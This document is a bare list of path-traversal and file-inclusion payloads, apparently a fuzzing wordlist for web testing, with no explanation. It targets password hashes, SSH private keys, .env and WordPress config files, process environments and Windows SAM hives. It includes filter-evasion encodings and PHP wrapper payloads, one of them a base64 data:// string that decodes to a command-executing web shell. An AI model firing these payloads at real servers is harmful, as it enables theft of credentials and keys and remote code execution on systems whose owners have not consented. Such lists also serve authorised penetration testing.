../../../../../../../etc/passwd
../../../../../../../etc/shadow
../../../../../../../etc/hosts
../../../../../../../etc/hostname
../../../../../../../etc/resolv.conf
../../../../../../../etc/group
../../../../../../../etc/issue
../../../../../../../etc/motd
../../../../../../../etc/mysql/my.cnf
../../../../../../../etc/nginx/nginx.conf
../../../../../../../etc/apache2/apache2.conf
../../../../../../../etc/httpd/httpd.conf
../../../../../../../etc/php/php.ini
../../../../../../../etc/crontab
../../../../../../../etc/ssh/sshd_config
../../../../../../../etc/ssl/openssl.cnf
../../../../../../../etc/lsb-release
../../../../../../../etc/os-release
../../../../../../../etc/security/limits.conf
../../../../../../../etc/sysctl.conf
../../../../../../../home/*/.bash_history
../../../../../../../home/*/.ssh/authorized_keys
../../../../../../../home/*/.ssh/id_rsa
../../../../../../../proc/self/cmdline
../../../../../../../proc/self/environ
../../../../../../../proc/self/fd/0
../../../../../../../proc/self/fd/1
../../../../../../../proc/self/fd/2
../../../../../../../proc/self/maps
../../../../../../../proc/self/status
../../../../../../../proc/version
../../../../../../../root/.bash_history
../../../../../../../root/.ssh/authorized_keys
../../../../../../../root/.ssh/id_rsa
../../../../../../../tmp/
../../../../../../../usr/local/etc/php/php.ini
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/auth.log
../../../../../../../var/log/cron.log
../../../../../../../var/log/httpd/access_log
../../../../../../../var/log/httpd/error_log
../../../../../../../var/log/mail.log
../../../../../../../var/log/mysql/error.log
../../../../../../../var/log/nginx/access.log
../../../../../../../var/log/nginx/error.log
../../../../../../../var/log/syslog
../../../../../../../var/www/html/.env
../../../../../../../var/www/html/config.php
../../../../../../../var/www/html/wp-config.php
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252F..%252Fetc%252Fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
....//....//....//....//etc/passwd
..%00/etc/passwd
..;/etc/passwd
..\/..\/..\/..\/etc/passwd
/etc/passwd
/etc/passwd%00
/etc/passwd%00.html
/etc/passwd%00.jpg
/etc/passwd%00.php
/proc/self/environ
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\inetsrv\config\applicationHost.config
C:\Windows\System32\inetsrv\config\web.config
C:\Windows\debug\NetSetup.log
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\system.ini
C:\Windows\win.ini
C:\boot.ini
C:\inetpub\logs\LogFiles\
C:\inetpub\wwwroot\web.config
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\passwords.txt
C:\xampp\php\php.ini
....\/....\/....\/etc/passwd
..0x2f..0x2f..0x2fetc/passwd
..%5c..%5c..%5c..%5cetc/passwd
..%5c..%5c..%5c..%5cwindows\win.ini
/app/.env
/app/config/database.yml
/app/config/secrets.yml
/opt/tomcat/conf/server.xml
/opt/tomcat/conf/tomcat-users.xml
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://input
php://stdin
expect://id
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
zip://shell.jpg%23payload.php
phar://shell.phar/test.txt
